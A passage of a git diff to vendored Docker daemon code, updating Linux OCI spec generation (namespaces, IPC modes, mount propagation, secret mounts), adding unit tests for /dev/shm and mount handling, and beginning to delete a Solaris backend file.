@@ -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( "fmt" @@ -10,21 +10,21 @@ import ( "strconv" "strings" - "github.com/Sirupsen/logrus" containertypes "github.com/docker/docker/api/types/container" "github.com/docker/docker/container" - 
"github.com/docker/docker/daemon/caps" + daemonconfig "github.com/docker/docker/daemon/config" "github.com/docker/docker/oci" "github.com/docker/docker/pkg/idtools" "github.com/docker/docker/pkg/mount" - "github.com/docker/docker/pkg/stringutils" - "github.com/docker/docker/pkg/symlink" - "github.com/docker/docker/volume" + volumemounts "github.com/docker/docker/volume/mounts" "github.com/opencontainers/runc/libcontainer/apparmor" "github.com/opencontainers/runc/libcontainer/cgroups" "github.com/opencontainers/runc/libcontainer/devices" "github.com/opencontainers/runc/libcontainer/user" - specs "github.com/opencontainers/runtime-spec/specs-go" + "github.com/opencontainers/runtime-spec/specs-go" + "github.com/pkg/errors" + "github.com/sirupsen/logrus" + "golang.org/x/sys/unix" ) func setResources(s *specs.Spec, r containertypes.Resources) error { @@ -50,13 +50,16 @@ func setResources(s *specs.Spec, r containertypes.Resources) error { } memoryRes := getMemoryResources(r) - cpuRes := getCPUResources(r) + cpuRes, err := getCPUResources(r) + if err != nil { + return err + } blkioWeight := r.BlkioWeight - specResources := &specs.Resources{ + specResources := &specs.LinuxResources{ Memory: memoryRes, CPU: cpuRes, - BlockIO: &specs.BlockIO{ + BlockIO: &specs.LinuxBlockIO{ Weight: &blkioWeight, WeightDevice: weightDevices, ThrottleReadBpsDevice: readBpsDevice, @@ -64,9 +67,8 @@ func setResources(s *specs.Spec, r containertypes.Resources) error { ThrottleReadIOPSDevice: readIOpsDevice, ThrottleWriteIOPSDevice: writeIOpsDevice, }, - DisableOOMKiller: r.OomKillDisable, - Pids: &specs.Pids{ - Limit: &r.PidsLimit, + Pids: &specs.LinuxPids{ + Limit: r.PidsLimit, }, } @@ -80,7 +82,7 @@ func setResources(s *specs.Spec, r containertypes.Resources) error { func setDevices(s *specs.Spec, c *container.Container) error { // Build lists of devices allowed and created within the container. 
- var devs []specs.Device + var devs []specs.LinuxDevice devPermissions := s.Linux.Resources.Devices if c.HostConfig.Privileged { hostDevices, err := devices.HostDevices() @@ -90,11 +92,10 @@ func setDevices(s *specs.Spec, c *container.Container) error { for _, d := range hostDevices { devs = append(devs, oci.Device(d)) } - rwm := "rwm" - devPermissions = []specs.DeviceCgroup{ + devPermissions = []specs.LinuxDeviceCgroup{ { Allow: true, - Access: &rwm, + Access: "rwm", }, } } else { @@ -106,6 +107,12 @@ func setDevices(s *specs.Spec, c *container.Container) error { devs = append(devs, d...) devPermissions = append(devPermissions, dPermissions...) } + + var err error + devPermissions, err = appendDevicePermissionsFromCgroupRules(devPermissions, c.HostConfig.DeviceCgroupRules) + if err != nil { + return err + } } s.Linux.Devices = append(s.Linux.Devices, devs...) @@ -113,15 +120,15 @@ func setDevices(s *specs.Spec, c *container.Container) error { return nil } -func setRlimits(daemon *Daemon, s *specs.Spec, c *container.Container) error { - var rlimits []specs.Rlimit +func (daemon *Daemon) setRlimits(s *specs.Spec, c *container.Container) error { + var rlimits []specs.POSIXRlimit // We want to leave the original HostConfig alone so make a copy here hostConfig := *c.HostConfig // Merge with the daemon defaults daemon.mergeUlimits(&hostConfig) for _, ul := range hostConfig.Ulimits { - rlimits = append(rlimits, specs.Rlimit{ + rlimits = append(rlimits, specs.POSIXRlimit{ Type: "RLIMIT_" + strings.ToUpper(ul.Name), Soft: uint64(ul.Soft), Hard: uint64(ul.Hard), @@ -144,7 +151,7 @@ func setUser(s *specs.Spec, c *container.Container) error { } func readUserFile(c *container.Container, p string) (io.ReadCloser, error) { - fp, err := symlink.FollowSymlinkInScope(filepath.Join(c.BaseFS, p), c.BaseFS) + fp, err := c.GetResourcePath(p) if err != nil { return nil, err } @@ -196,7 +203,7 @@ func getUser(c *container.Container, username string) (uint32, uint32, []uint32, return uid, 
gid, additionalGids, nil } -func setNamespace(s *specs.Spec, ns specs.Namespace) { +func setNamespace(s *specs.Spec, ns specs.LinuxNamespace) { for i, n := range s.Linux.Namespaces { if n.Type == ns.Type { s.Linux.Namespaces[i] = ns @@ -206,37 +213,22 @@ func setNamespace(s *specs.Spec, ns specs.Namespace) { s.Linux.Namespaces = append(s.Linux.Namespaces, ns) } -func setCapabilities(s *specs.Spec, c *container.Container) error { - var caplist []string - var err error - if c.HostConfig.Privileged { - caplist = caps.GetAllCapabilities() - } else { - caplist, err = caps.TweakCapabilities(s.Process.Capabilities, c.HostConfig.CapAdd, c.HostConfig.CapDrop) - if err != nil { - return err - } - } - s.Process.Capabilities = caplist - return nil -} - func setNamespaces(daemon *Daemon, s *specs.Spec, c *container.Container) error { userNS := false // user if c.HostConfig.UsernsMode.IsPrivate() { - uidMap, gidMap := daemon.GetUIDGIDMaps() + uidMap := daemon.idMappings.UIDs() if uidMap != nil { userNS = true - ns := specs.Namespace{Type: "user"} + ns := specs.LinuxNamespace{Type: "user"} setNamespace(s, ns) s.Linux.UIDMappings = specMapping(uidMap) - s.Linux.GIDMappings = specMapping(gidMap) + s.Linux.GIDMappings = specMapping(daemon.idMappings.GIDs()) } } // network if !c.Config.NetworkDisabled { - ns := specs.Namespace{Type: "network"} + ns := specs.LinuxNamespace{Type: "network"} parts := strings.SplitN(string(c.HostConfig.NetworkMode), ":", 2) if parts[0] == "container" { nc, err := daemon.getNetworkedContainer(c.ID, c.HostConfig.NetworkMode.ConnectedContainer()) @@ -246,7 +238,7 @@ func setNamespaces(daemon *Daemon, s *specs.Spec, c *container.Container) error ns.Path = fmt.Sprintf("/proc/%d/ns/net", nc.State.GetPID()) if userNS { // to share a net namespace, they must also share a user namespace - nsUser := specs.Namespace{Type: "user"} + nsUser := specs.LinuxNamespace{Type: "user"} nsUser.Path = fmt.Sprintf("/proc/%d/ns/user", nc.State.GetPID()) setNamespace(s, nsUser) } 
@@ -255,10 +247,13 @@ func setNamespaces(daemon *Daemon, s *specs.Spec, c *container.Container) error } setNamespace(s, ns) } + // ipc - if c.HostConfig.IpcMode.IsContainer() { - ns := specs.Namespace{Type: "ipc"} - ic, err := daemon.getIpcContainer(c) + ipcMode := c.HostConfig.IpcMode + switch { + case ipcMode.IsContainer(): + ns := specs.LinuxNamespace{Type: "ipc"} + ic, err := daemon.getIpcContainer(ipcMode.Container()) if err != nil { return err } @@ -266,19 +261,26 @@ func setNamespaces(daemon *Daemon, s *specs.Spec, c *container.Container) error setNamespace(s, ns) if userNS { // to share an IPC namespace, they must also share a user namespace - nsUser := specs.Namespace{Type: "user"} + nsUser := specs.LinuxNamespace{Type: "user"} nsUser.Path = fmt.Sprintf("/proc/%d/ns/user", ic.State.GetPID()) setNamespace(s, nsUser) } - } else if c.HostConfig.IpcMode.IsHost() { - oci.RemoveNamespace(s, specs.NamespaceType("ipc")) - } else { - ns := specs.Namespace{Type: "ipc"} + case ipcMode.IsHost(): + oci.RemoveNamespace(s, specs.LinuxNamespaceType("ipc")) + case ipcMode.IsEmpty(): + // A container was created by an older version of the daemon. + // The default behavior used to be what is now called "shareable". 
+ fallthrough + case ipcMode.IsPrivate(), ipcMode.IsShareable(), ipcMode.IsNone(): + ns := specs.LinuxNamespace{Type: "ipc"} setNamespace(s, ns) + default: + return fmt.Errorf("Invalid IPC mode: %v", ipcMode) } + // pid if c.HostConfig.PidMode.IsContainer() { - ns := specs.Namespace{Type: "pid"} + ns := specs.LinuxNamespace{Type: "pid"} pc, err := daemon.getPidContainer(c) if err != nil { return err @@ -287,29 +289,29 @@ func setNamespaces(daemon *Daemon, s *specs.Spec, c *container.Container) error setNamespace(s, ns) if userNS { // to share a PID namespace, they must also share a user namespace - nsUser := specs.Namespace{Type: "user"} + nsUser := specs.LinuxNamespace{Type: "user"} nsUser.Path = fmt.Sprintf("/proc/%d/ns/user", pc.State.GetPID()) setNamespace(s, nsUser) } } else if c.HostConfig.PidMode.IsHost() { - oci.RemoveNamespace(s, specs.NamespaceType("pid")) + oci.RemoveNamespace(s, specs.LinuxNamespaceType("pid")) } else { - ns := specs.Namespace{Type: "pid"} + ns := specs.LinuxNamespace{Type: "pid"} setNamespace(s, ns) } // uts if c.HostConfig.UTSMode.IsHost() { - oci.RemoveNamespace(s, specs.NamespaceType("uts")) + oci.RemoveNamespace(s, specs.LinuxNamespaceType("uts")) s.Hostname = "" } return nil } -func specMapping(s []idtools.IDMap) []specs.IDMapping { - var ids []specs.IDMapping +func specMapping(s []idtools.IDMap) []specs.LinuxIDMapping { + var ids []specs.LinuxIDMapping for _, item := range s { - ids = append(ids, specs.IDMapping{ + ids = append(ids, specs.LinuxIDMapping{ HostID: uint32(item.HostID), ContainerID: uint32(item.ContainerID), Size: uint32(item.Size), @@ -318,15 +320,6 @@ func specMapping(s []idtools.IDMap) []specs.IDMapping { return ids } -func getMountInfo(mountinfo []*mount.Info, dir string) *mount.Info { - for _, m := range mountinfo { - if m.Mountpoint == dir { - return m - } - } - return nil -} - // Get the source mount point of directory passed in as argument. Also return // optional fields. 
func getSourceMount(source string) (string, string, error) { @@ -336,84 +329,101 @@ func getSourceMount(source string) (string, string, error) { return "", "", err } - mountinfos, err := mount.GetMounts() + mi, err := mount.GetMounts(mount.ParentsFilter(sourcePath)) if err != nil { return "", "", err } - - mountinfo := getMountInfo(mountinfos, sourcePath) - if mountinfo != nil { - return sourcePath, mountinfo.Optional, nil + if len(mi) < 1 { + return "", "", fmt.Errorf("Can't find mount point of %s", source) } - path := sourcePath - for { - path = filepath.Dir(path) - - mountinfo = getMountInfo(mountinfos, path) - if mountinfo != nil { - return path, mountinfo.Optional, nil + // find the longest mount point + var idx, maxlen int + for i := range mi { + if len(mi[i].Mountpoint) > maxlen { + maxlen = len(mi[i].Mountpoint) + idx = i } + } + return mi[idx].Mountpoint, mi[idx].Optional, nil +} + +const ( + sharedPropagationOption = "shared:" + slavePropagationOption = "master:" +) - if path == "/" { - break +// hasMountinfoOption checks if any of the passed any of the given option values +// are set in the passed in option string. +func hasMountinfoOption(opts string, vals ...string) bool { + for _, opt := range strings.Split(opts, " ") { + for _, val := range vals { + if strings.HasPrefix(opt, val) { + return true + } } } - - // If we are here, we did not find parent mount. Something is wrong. - return "", "", fmt.Errorf("Could not find source mount of %s", source) + return false } // Ensure mount point on which path is mounted, is shared. func ensureShared(path string) error { - sharedMount := false - sourceMount, optionalOpts, err := getSourceMount(path) if err != nil { return err } // Make sure source mount point is shared. 
- optsSplit := strings.Split(optionalOpts, " ") - for _, opt := range optsSplit { - if strings.HasPrefix(opt, "shared:") { - sharedMount = true - break - } - } - - if !sharedMount { - return fmt.Errorf("Path %s is mounted on %s but it is not a shared mount.", path, sourceMount) + if !hasMountinfoOption(optionalOpts, sharedPropagationOption) { + return errors.Errorf("path %s is mounted on %s but it is not a shared mount", path, sourceMount) } return nil } // Ensure mount point on which path is mounted, is either shared or slave. func ensureSharedOrSlave(path string) error { - sharedMount := false - slaveMount := false - sourceMount, optionalOpts, err := getSourceMount(path) if err != nil { return err } - // Make sure source mount point is shared. - optsSplit := strings.Split(optionalOpts, " ") - for _, opt := range optsSplit { - if strings.HasPrefix(opt, "shared:") { - sharedMount = true - break - } else if strings.HasPrefix(opt, "master:") { - slaveMount = true - break - } - } - if !sharedMount && !slaveMount { - return fmt.Errorf("Path %s is mounted on %s but it is not a shared or slave mount.", path, sourceMount) + if !hasMountinfoOption(optionalOpts, sharedPropagationOption, slavePropagationOption) { + return errors.Errorf("path %s is mounted on %s but it is not a shared or slave mount", path, sourceMount) } return nil } +// Get the set of mount flags that are set on the mount that contains the given +// path and are locked by CL_UNPRIVILEGED. This is necessary to ensure that +// bind-mounting "with options" will not fail with user namespaces, due to +// kernel restrictions that require user namespace mounts to preserve +// CL_UNPRIVILEGED locked flags. +func getUnprivilegedMountFlags(path string) ([]string, error) { + var statfs unix.Statfs_t + if err := unix.Statfs(path, &statfs); err != nil { + return nil, err + } + + // The set of keys come from https://github.com/torvalds/linux/blob/v4.13/fs/namespace.c#L1034-L1048. 
+ unprivilegedFlags := map[uint64]string{ + unix.MS_RDONLY: "ro", + unix.MS_NODEV: "nodev", + unix.MS_NOEXEC: "noexec", + unix.MS_NOSUID: "nosuid", + unix.MS_NOATIME: "noatime", + unix.MS_RELATIME: "relatime", + unix.MS_NODIRATIME: "nodiratime", + } + + var flags []string + for mask, flag := range unprivilegedFlags { + if uint64(statfs.Flags)&mask == mask { + flags = append(flags, flag) + } + } + + return flags, nil +} + var ( mountPropagationMap = map[string]int{ "private": mount.PRIVATE, @@ -434,35 +444,66 @@ var ( } ) +// inSlice tests whether a string is contained in a slice of strings or not. +// Comparison is case sensitive +func inSlice(slice []string, s string) bool { + for _, ss := range slice { + if s == ss { + return true + } + } + return false +} + func setMounts(daemon *Daemon, s *specs.Spec, c *container.Container, mounts []container.Mount) error { userMounts := make(map[string]struct{}) for _, m := range mounts { userMounts[m.Destination] = struct{}{} } - // Filter out mounts that are overridden by user supplied mounts - var defaultMounts []specs.Mount + // Copy all mounts from spec to defaultMounts, except for + // - mounts overriden by a user supplied mount; + // - all mounts under /dev if a user supplied /dev is present; + // - /dev/shm, in case IpcMode is none. + // While at it, also + // - set size for /dev/shm from shmsize. 
+ defaultMounts := s.Mounts[:0] _, mountDev := userMounts["/dev"] for _, m := range s.Mounts { - if _, ok := userMounts[m.Destination]; !ok { - if mountDev && strings.HasPrefix(m.Destination, "/dev/") { + if _, ok := userMounts[m.Destination]; ok { + // filter out mount overridden by a user supplied mount + continue + } + if mountDev && strings.HasPrefix(m.Destination, "/dev/") { + // filter out everything under /dev if /dev is user-mounted + continue + } + + if m.Destination == "/dev/shm" { + if c.HostConfig.IpcMode.IsNone() { + // filter out /dev/shm for "none" IpcMode continue } - defaultMounts = append(defaultMounts, m) + // set size for /dev/shm mount from spec + sizeOpt := "size=" + strconv.FormatInt(c.HostConfig.ShmSize, 10) + m.Options = append(m.Options, sizeOpt) } + + defaultMounts = append(defaultMounts, m) } s.Mounts = defaultMounts for _, m := range mounts { for _, cm := range s.Mounts { if cm.Destination == m.Destination { - return fmt.Errorf("Duplicate mount point '%s'", m.Destination) + return duplicateMountPointError(m.Destination) } } if m.Source == "tmpfs" { data := m.Data - options := []string{"noexec", "nosuid", "nodev", string(volume.DefaultPropagationMode)} + parser := volumemounts.NewParser("linux") + options := []string{"noexec", "nosuid", "nodev", string(parser.DefaultPropagationMode())} if data != "" { options = append(options, strings.Split(data, ",")...) } @@ -486,7 +527,8 @@ func setMounts(daemon *Daemon, s *specs.Spec, c *container.Container, mounts []c // // For private volumes any root propagation value should work. 
pFlag := mountPropagationMap[m.Propagation] - if pFlag == mount.SHARED || pFlag == mount.RSHARED { + switch pFlag { + case mount.SHARED, mount.RSHARED: if err := ensureShared(m.Source); err != nil { return err } @@ -494,13 +536,34 @@ func setMounts(daemon *Daemon, s *specs.Spec, c *container.Container, mounts []c if rootpg != mount.SHARED && rootpg != mount.RSHARED { s.Linux.RootfsPropagation = mountPropagationReverseMap[mount.SHARED] } - } else if pFlag == mount.SLAVE || pFlag == mount.RSLAVE { + case mount.SLAVE, mount.RSLAVE: + var fallback bool if err := ensureSharedOrSlave(m.Source); err != nil { - return err + // For backwards compatability purposes, treat mounts from the daemon root + // as special since we automatically add rslave propagation to these mounts + // when the user did not set anything, so we should fallback to the old + // behavior which is to use private propagation which is normally the + // default. + if !strings.HasPrefix(m.Source, daemon.root) && !strings.HasPrefix(daemon.root, m.Source) { + return err + } + + cm, ok := c.MountPoints[m.Destination] + if !ok { + return err + } + if cm.Spec.BindOptions != nil && cm.Spec.BindOptions.Propagation != "" { + // This means the user explicitly set a propagation, do not fallback in that case. 
+ return err + } + fallback = true + logrus.WithField("container", c.ID).WithField("source", m.Source).Warn("Falling back to default propagation for bind source in daemon root") } - rootpg := mountPropagationMap[s.Linux.RootfsPropagation] - if rootpg != mount.SHARED && rootpg != mount.RSHARED && rootpg != mount.SLAVE && rootpg != mount.RSLAVE { - s.Linux.RootfsPropagation = mountPropagationReverseMap[mount.RSLAVE] + if !fallback { + rootpg := mountPropagationMap[s.Linux.RootfsPropagation] + if rootpg != mount.SHARED && rootpg != mount.RSHARED && rootpg != mount.SLAVE && rootpg != mount.RSLAVE { + s.Linux.RootfsPropagation = mountPropagationReverseMap[mount.RSLAVE] + } } } @@ -512,6 +575,19 @@ func setMounts(daemon *Daemon, s *specs.Spec, c *container.Container, mounts []c opts = append(opts, mountPropagationReverseMap[pFlag]) } + // If we are using user namespaces, then we must make sure that we + // don't drop any of the CL_UNPRIVILEGED "locked" flags of the source + // "mount" when we bind-mount. The reason for this is that at the point + // when runc sets up the root filesystem, it is already inside a user + // namespace, and thus cannot change any flags that are locked. + if daemon.configStore.RemappedRoot != "" { + unprivOpts, err := getUnprivilegedMountFlags(m.Source) + if err != nil { + return err + } + opts = append(opts, unprivOpts...) 
+ } + mt.Options = opts s.Mounts = append(s.Mounts, mt) } @@ -519,11 +595,11 @@ func setMounts(daemon *Daemon, s *specs.Spec, c *container.Container, mounts []c if s.Root.Readonly { for i, m := range s.Mounts { switch m.Destination { - case "/proc", "/dev/pts", "/dev/mqueue": // /dev is remounted by runc + case "/proc", "/dev/pts", "/dev/shm", "/dev/mqueue", "/dev": continue } if _, ok := userMounts[m.Destination]; !ok { - if !stringutils.InSlice(m.Options, "ro") { + if !inSlice(m.Options, "ro") { s.Mounts[i].Options = append(s.Mounts[i].Options, "ro") } } @@ -531,12 +607,10 @@ func setMounts(daemon *Daemon, s *specs.Spec, c *container.Container, mounts []c } if c.HostConfig.Privileged { - if !s.Root.Readonly { - // clear readonly for /sys - for i := range s.Mounts { - if s.Mounts[i].Destination == "/sys" { - clearReadOnly(&s.Mounts[i]) - } + // clear readonly for /sys + for i := range s.Mounts { + if s.Mounts[i].Destination == "/sys" { + clearReadOnly(&s.Mounts[i]) } } s.Linux.ReadonlyPaths = nil @@ -545,7 +619,7 @@ func setMounts(daemon *Daemon, s *specs.Spec, c *container.Container, mounts []c // TODO: until a kernel/mount solution exists for handling remount in a user namespace, // we must clear the readonly flag for the cgroups mount (@mrunalp concurs) - if uidMap, _ := daemon.GetUIDGIDMaps(); uidMap != nil || c.HostConfig.Privileged { + if uidMap := daemon.idMappings.UIDs(); uidMap != nil || c.HostConfig.Privileged { for i, m := range s.Mounts { if m.Type == "cgroup" { clearReadOnly(&s.Mounts[i]) @@ -557,16 +631,18 @@ func setMounts(daemon *Daemon, s *specs.Spec, c *container.Container, mounts []c } func (daemon *Daemon) populateCommonSpec(s *specs.Spec, c *container.Container) error { + if c.BaseFS == nil { + return errors.New("populateCommonSpec: BaseFS of container " + c.ID + " is unexpectedly nil") + } linkedEnv, err := daemon.setupLinkedContainers(c) if err != nil { return err } - s.Root = specs.Root{ - Path: c.BaseFS, + s.Root = &specs.Root{ + Path: 
c.BaseFS.Path(), Readonly: c.HostConfig.ReadonlyRootfs, } - rootUID, rootGID := daemon.GetRemappedUIDGID() - if err := c.SetupWorkingDirectory(rootUID, rootGID); err != nil { + if err := c.SetupWorkingDirectory(daemon.idMappings.RootPair()); err != nil { return err } cwd := c.Config.WorkingDir @@ -583,8 +659,8 @@ func (daemon *Daemon) populateCommonSpec(s *specs.Spec, c *container.Container) (c.HostConfig.Init == nil && daemon.configStore.Init) { s.Process.Args = append([]string{"/dev/init", "--", c.Path}, c.Args...) var path string - if daemon.configStore.InitPath == "" && c.HostConfig.InitPath == "" { - path, err = exec.LookPath(DefaultInitBinary) + if daemon.configStore.InitPath == "" { + path, err = exec.LookPath(daemonconfig.DefaultInitBinary) if err != nil { return err } @@ -592,9 +668,6 @@ func (daemon *Daemon) populateCommonSpec(s *specs.Spec, c *container.Container) if daemon.configStore.InitPath != "" { path = daemon.configStore.InitPath } - if c.HostConfig.InitPath != "" { - path = c.HostConfig.InitPath - } s.Mounts = append(s.Mounts, specs.Mount{ Destination: "/dev/init", Type: "bind", @@ -611,7 +684,7 @@ func (daemon *Daemon) populateCommonSpec(s *specs.Spec, c *container.Container) return nil } -func (daemon *Daemon) createSpec(c *container.Container) (*specs.Spec, error) { +func (daemon *Daemon) createSpec(c *container.Container) (retSpec *specs.Spec, err error) { s := oci.DefaultSpec() if err := daemon.populateCommonSpec(&s, c); err != nil { return nil, err @@ -637,25 +710,24 @@ func (daemon *Daemon) createSpec(c *container.Container) (*specs.Spec, error) { } else { cgroupsPath = filepath.Join(parent, c.ID) } - s.Linux.CgroupsPath = &cgroupsPath + s.Linux.CgroupsPath = cgroupsPath if err := setResources(&s, c.HostConfig.Resources); err != nil { return nil, fmt.Errorf("linux runtime spec resources: %v", err) } - s.Linux.Resources.OOMScoreAdj = &c.HostConfig.OomScoreAdj s.Linux.Sysctl = c.HostConfig.Sysctls - p := *s.Linux.CgroupsPath + p := 
s.Linux.CgroupsPath if useSystemd { - initPath, err := cgroups.GetInitCgroupDir("cpu") + initPath, err := cgroups.GetInitCgroup("cpu") if err != nil { return nil, err } - p, _ = cgroups.GetThisCgroupDir("cpu") + _, err = cgroups.GetOwnCgroup("cpu") if err != nil { return nil, err } - p = filepath.Join(initPath, p) + p = filepath.Join(initPath, s.Linux.CgroupsPath) } // Clean path to guard against things like ../../../BAD @@ -670,7 +742,7 @@ func (daemon *Daemon) createSpec(c *container.Container) (*specs.Spec, error) { if err := setDevices(&s, c); err != nil { return nil, fmt.Errorf("linux runtime spec devices: %v", err) } - if err := setRlimits(daemon, &s, c); err != nil { + if err := daemon.setRlimits(&s, c); err != nil { return nil, fmt.Errorf("linux runtime spec rlimits: %v", err) } if err := setUser(&s, c); err != nil { @@ -686,10 +758,20 @@ func (daemon *Daemon) createSpec(c *container.Container) (*specs.Spec, error) { return nil, fmt.Errorf("linux seccomp: %v", err) } + if err := daemon.setupContainerMountsRoot(c); err != nil { + return nil, err + } + if err := daemon.setupIpcDirs(c); err != nil { return nil, err } + defer func() { + if err != nil { + daemon.cleanupSecretDir(c) + } + }() + if err := daemon.setupSecretDir(c); err != nil { return nil, err } @@ -699,7 +781,9 @@ func (daemon *Daemon) createSpec(c *container.Container) (*specs.Spec, error) { return nil, err } - ms = append(ms, c.IpcMounts()...) + if !c.HostConfig.IpcMode.IsPrivate() && !c.HostConfig.IpcMode.IsEmpty() { + ms = append(ms, c.IpcMounts()...) + } tmpfsMounts, err := c.TmpfsMounts() if err != nil { @@ -707,9 +791,11 @@ func (daemon *Daemon) createSpec(c *container.Container) (*specs.Spec, error) { } ms = append(ms, tmpfsMounts...) - if m := c.SecretMount(); m != nil { - ms = append(ms, *m) + secretMounts, err := c.SecretMounts() + if err != nil { + return nil, err } + ms = append(ms, secretMounts...) 
sort.Sort(mounts(ms)) if err := setMounts(daemon, &s, c, ms); err != nil { @@ -718,14 +804,10 @@ func (daemon *Daemon) createSpec(c *container.Container) (*specs.Spec, error) { for _, ns := range s.Linux.Namespaces { if ns.Type == "network" && ns.Path == "" && !c.Config.NetworkDisabled { - target, err := os.Readlink(filepath.Join("/proc", strconv.Itoa(os.Getpid()), "exe")) - if err != nil { - return nil, err - } - - s.Hooks = specs.Hooks{ + target := filepath.Join("/proc", strconv.Itoa(os.Getpid()), "exe") + s.Hooks = &specs.Hooks{ Prestart: []specs.Hook{{ - Path: target, // FIXME: cross-platform + Path: target, Args: []string{"libnetwork-setkey", c.ID, daemon.netController.ID()}, }}, } @@ -758,9 +840,18 @@ func (daemon *Daemon) createSpec(c *container.Container) (*specs.Spec, error) { } s.Process.SelinuxLabel = c.GetProcessLabel() s.Process.NoNewPrivileges = c.NoNewPrivileges + s.Process.OOMScoreAdj = &c.HostConfig.OomScoreAdj s.Linux.MountLabel = c.MountLabel - return (*specs.Spec)(&s), nil + // Set the masked and readonly paths with regard to the host config options if they are set. 
+ if c.HostConfig.MaskedPaths != nil { + s.Linux.MaskedPaths = c.HostConfig.MaskedPaths + } + if c.HostConfig.ReadonlyPaths != nil { + s.Linux.ReadonlyPaths = c.HostConfig.ReadonlyPaths + } + + return &s, nil } func clearReadOnly(m *specs.Mount) { diff --git a/vendor/github.com/docker/docker/daemon/oci_linux_test.go b/vendor/github.com/docker/docker/daemon/oci_linux_test.go new file mode 100644 index 0000000000..e618951ef9 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/oci_linux_test.go @@ -0,0 +1,102 @@ +package daemon // import "github.com/docker/docker/daemon" + +import ( + "os" + "testing" + + containertypes "github.com/docker/docker/api/types/container" + "github.com/docker/docker/container" + "github.com/docker/docker/daemon/config" + "github.com/docker/docker/oci" + "github.com/docker/docker/pkg/idtools" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" +) + +// TestTmpfsDevShmNoDupMount checks that a user-specified /dev/shm tmpfs +// mount (as in "docker run --tmpfs /dev/shm:rw,size=NNN") does not result +// in "Duplicate mount point" error from the engine. +// https://github.com/moby/moby/issues/35455 +func TestTmpfsDevShmNoDupMount(t *testing.T) { + d := Daemon{ + // some empty structs to avoid getting a panic + // caused by a null pointer dereference + idMappings: &idtools.IDMappings{}, + configStore: &config.Config{}, + } + c := &container.Container{ + ShmPath: "foobar", // non-empty, for c.IpcMounts() to work + HostConfig: &containertypes.HostConfig{ + IpcMode: containertypes.IpcMode("shareable"), // default mode + // --tmpfs /dev/shm:rw,exec,size=NNN + Tmpfs: map[string]string{ + "/dev/shm": "rw,exec,size=1g", + }, + }, + } + + // Mimick the code flow of daemon.createSpec(), enough to reproduce the issue + ms, err := d.setupMounts(c) + assert.Check(t, err) + + ms = append(ms, c.IpcMounts()...) + + tmpfsMounts, err := c.TmpfsMounts() + assert.Check(t, err) + ms = append(ms, tmpfsMounts...) 
+ + s := oci.DefaultSpec() + err = setMounts(&d, &s, c, ms) + assert.Check(t, err) +} + +// TestIpcPrivateVsReadonly checks that in case of IpcMode: private +// and ReadonlyRootfs: true (as in "docker run --ipc private --read-only") +// the resulting /dev/shm mount is NOT made read-only. +// https://github.com/moby/moby/issues/36503 +func TestIpcPrivateVsReadonly(t *testing.T) { + d := Daemon{ + // some empty structs to avoid getting a panic + // caused by a null pointer dereference + idMappings: &idtools.IDMappings{}, + configStore: &config.Config{}, + } + c := &container.Container{ + HostConfig: &containertypes.HostConfig{ + IpcMode: containertypes.IpcMode("private"), + ReadonlyRootfs: true, + }, + } + + // We can't call createSpec() so mimick the minimal part + // of its code flow, just enough to reproduce the issue. + ms, err := d.setupMounts(c) + assert.Check(t, err) + + s := oci.DefaultSpec() + s.Root.Readonly = c.HostConfig.ReadonlyRootfs + + err = setMounts(&d, &s, c, ms) + assert.Check(t, err) + + // Find the /dev/shm mount in ms, check it does not have ro + for _, m := range s.Mounts { + if m.Destination != "/dev/shm" { + continue + } + assert.Check(t, is.Equal(false, inSlice(m.Options, "ro"))) + } +} + +func TestGetSourceMount(t *testing.T) { + // must be able to find source mount for / + mnt, _, err := getSourceMount("/") + assert.NilError(t, err) + assert.Equal(t, mnt, "/") + + // must be able to find source mount for current directory + cwd, err := os.Getwd() + assert.NilError(t, err) + _, _, err = getSourceMount(cwd) + assert.NilError(t, err) +} diff --git a/vendor/github.com/docker/docker/daemon/oci_solaris.go b/vendor/github.com/docker/docker/daemon/oci_solaris.go deleted file mode 100644 index 0c757f9196..0000000000 --- a/vendor/github.com/docker/docker/daemon/oci_solaris.go +++ /dev/null @@ -1,188 +0,0 @@ -package daemon - -import ( - "fmt" - "path/filepath" - "sort" - "strconv" - - containertypes "github.com/docker/docker/api/types/container" - 
"github.com/docker/docker/container" - "github.com/docker/docker/oci" - "github.com/docker/libnetwork" - "github.com/opencontainers/runtime-spec/specs-go" -) - -func setResources(s *specs.Spec, r containertypes.Resources) error { - mem := getMemoryResources(r) - s.Solaris.CappedMemory = &mem - - capCPU := getCPUResources(r) - s.Solaris.CappedCPU = &capCPU - - return nil -} - -func setUser(s *specs.Spec, c *container.Container) error { - uid, gid, additionalGids, err := getUser(c, c.Config.User) - if err != nil { - return err - } - s.Process.User.UID = uid - s.Process.User.GID = gid - s.Process.User.AdditionalGids = additionalGids - return nil -} - -func getUser(c *container.Container, username string) (uint32, uint32, []uint32, error) { - return 0, 0, nil, nil -} - -func (daemon *Daemon) getRunzAnet(ep libnetwork.Endpoint) (specs.Anet, error) { - var ( - linkName string - lowerLink string - defRouter string - ) - - epInfo := ep.Info() - if epInfo == nil { - return specs.Anet{}, fmt.Errorf("invalid endpoint") - } - - nw, err := daemon.GetNetworkByName(ep.Network()) - if err != nil { - return specs.Anet{}, fmt.Errorf("Failed to get network %s: %v", ep.Network(), err) - } - - // Evaluate default router, linkname and lowerlink for interface endpoint - switch nw.Type() { - case "bridge": - defRouter = epInfo.Gateway().String() - linkName = "net0" // Should always be net0 for a container - - // TODO We construct lowerlink here exactly as done for solaris bridge - // initialization. Need modular code to reuse. - options := nw.Info().DriverOptions() - nwName := options["com.docker.network.bridge.name"] - lastChar := nwName[len(nwName)-1:] - if _, err = strconv.Atoi(lastChar); err != nil { - lowerLink = nwName + "_0" - } else { - lowerLink = nwName - } - - case "overlay": - defRouter = "" - linkName = "net1" - - // TODO Follows generateVxlanName() in solaris overlay. 
